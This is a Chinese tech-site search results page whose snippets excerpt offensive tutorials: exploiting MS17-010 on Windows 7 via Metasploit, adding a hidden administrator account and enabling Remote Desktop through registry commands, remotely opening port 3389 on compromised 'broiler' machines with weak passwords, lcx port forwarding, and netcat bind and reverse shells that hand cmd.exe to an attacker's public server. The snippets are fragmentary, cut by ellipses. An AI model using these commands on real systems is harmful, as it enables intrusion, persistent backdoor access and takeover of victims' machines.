首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

利用ms17_010开启3389端口

攻击机kali 目标机win7 sp1(旗舰版) 当nmap或其他工具发现目标及上有445端口开启,可以考虑检测是否存在永恒之蓝,使用msf中的永恒之蓝检测模块 use auxiliary/scanner...blue/blue net user blue blue /add 将用户blue添加入管理组 (不加入会连接不上) net localgroup administrators blue /add 开启远程桌面功能..."Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389...如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接

3.3K40
您找到你想要的搜索结果了吗?
是的
没有找到

开启3389批量登录端口的几种方法:

2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05   使用方法:   在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:   c:\...默认是3389。   自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。   使用/fr表示强制重起目标。(如果/r不行,可以试试这个)   使用此参数时,端口设置不能忽略。   ...比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空   运行CMD(2000下的DOS),我们给它开终端!   ...cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr   上面的命令应该可以理解吧?...3,下载3389自动安装程序-djshao正式版5.0   说明:   解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入

1.9K20

lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...用法: 如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。...二、nc 反弹 cmdshell 开启肉鸡代理执行 cmdshell 在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe 意思是,肉鸡监听本地的 2333 端口,且应答通过 telnet...(-t)模式执行 cmd.exe 程序 在自己的公网服务器上执行 nc -nvv 肉鸡 ip 2333 反向代理执行 cmdshell 在公网服务器上运行 nc -l -p 2333 意思是监听本地端口...2333,登台其他电脑登陆过来 在肉鸡上执行 nc -t -e cmd.exe 公网服务器 ip 2333 意思是让肉鸡可以通过 telnet 模式执行 cmd.exe 程序,并可以把执行权通过 2333

3.1K30
领券